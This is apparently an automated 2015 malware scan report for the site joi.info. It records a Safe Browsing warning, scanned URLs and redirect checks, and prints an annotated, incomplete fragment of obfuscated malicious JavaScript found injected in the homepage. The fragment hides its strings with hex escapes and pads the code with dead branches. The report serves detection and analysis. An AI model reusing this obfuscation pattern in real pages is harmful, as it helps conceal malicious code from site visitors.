Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=joi.info
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious: visiting this website may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://joi.info/ | 200 OK Content-Length: 15366 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
Note: the excerpt below is an incomplete fragment of an obfuscated script (its braces do not balance). The hex-escaped strings decode to "appendChild", "body", "parseInt" and "fromCharCode"; the if-statements that compare two different string literals can never be true and are filler; the visible logic calls document.body.appendChild on an element built outside the excerpt and invokes FBGmeAs both directly and through setTimeout(…,120).
if('xaLu'=='JIBM')UmeqSu='wkTKJ';var UZSoKn=7;var iniPno;function OtkWK(){var HYmK='xRDFsu';if('tRJbEP'=='WVJP')gJcC();}function MDtf(){}
var APhFAG;var UcUDiTw="a\x70\x70endChild";var LLwP='KroTx';var hYfGM;var BTMZw=58;var nXqWh="b\x6fd\x79";function tdqK(){var mPuP='HpxW';if('oMFw'=='GhnShr')SPtffS();}var AGmfrj='yLqnz';var RLxAOm="par\x73eInt";var SbKVl;var RbTDgA;if('nIBcJV'=='CHsC')SBBToE();var uSlQv="fro\x6dCha\x72C\x6f\x64\x65";function vgjig(){}var HzaJd='oQcej';var appVersion_var= document[nXqWh][UcUDiTw](WpMJhNMG);function WwTGYK(){}var BqyKi;}else{var JsOIV=81;if('LmdP'=='fwwFXg')fXQh();setTimeout(FBGmeAs,120);var rWvMci;} function KjqoTt(){}} if('LlTtYH'=='hRKeod')xgcpZ='xaud';FBGmeAs();function fVfT(){var uYFRp='irZH';if('Tstsa'=='aSQvq')XWNOKI();}if('vldiji'=='tdMwq')XxjN();if('lfjrB'=='oGjncO')eYlybk='abZPVB';if('qcolY'=='oBEG')GBrw='izZdr';var gZKRTe;
Antivirus reports:
| ||
http://calendar.pirontech.com/counter.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=864000 Connection: close Date: Mon, 12 Jan 2015 10:37:37 GMT Location: https://calendar.pirontech.com/counter.js Server: Apache Content-Length: 249 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 22 Jan 2015 10:37:37 GMT | clean |
https://calendar.pirontech.com/counter.js | HTTP/1.1 301 Moved Permanently Cache-Control: max-age=864000 Connection: close Date: Mon, 12 Jan 2015 10:37:38 GMT Location: https://www.calendar.pirontech.com/counter.js Server: Apache Content-Length: 253 Content-Type: text/html; charset=iso-8859-1 Expires: Thu, 22 Jan 2015 10:37:38 GMT | clean |
https://www.calendar.pirontech.com/counter.js | 500 Can't connect to www.calendar.pirontech.com:443 Content-Length: 203 Content-Type: text/plain | clean |
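http://www.calendar.pirontech.com/test404page.js | 500 Can't connect to www.calendar.pirontech.com:80 Content-Length: 201 Content-Type: text/plain | clean |
Note: the three counter.js requests form one redirect chain (http → https → https://www) whose final host could not be reached, so "clean" in these rows means only that the redirect and error responses contained nothing malicious. The content of counter.js itself was never retrieved or scanned.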
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: joi.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 10:26:11 GMT
Server: Microsoft-IIS/4.0
Content-Type: text/html
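X-Died: timeout at scan.pm line 1566.
Note: X-Died is not a header sent by the web server; it appears to be added by the scanner's own HTTP client when its fetch timed out, so the response the scanner analysed here may be incomplete.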
GET / HTTP/1.1
Host: joi.info
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Jan 2015 10:26:11 GMT
Server: Microsoft-IIS/4.0
Content-Type: text/html
X-Died: timeout at scan.pm line 1566.
Second query (visit from search engine):
GET / HTTP/1.1
Host: joi.info
Referer: http://www.google.com/search?q=joi.info
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: joi.info
Referer: http://www.google.com/search?q=joi.info
Result:
The result is similar to the first query. There are no suspicious redirects found.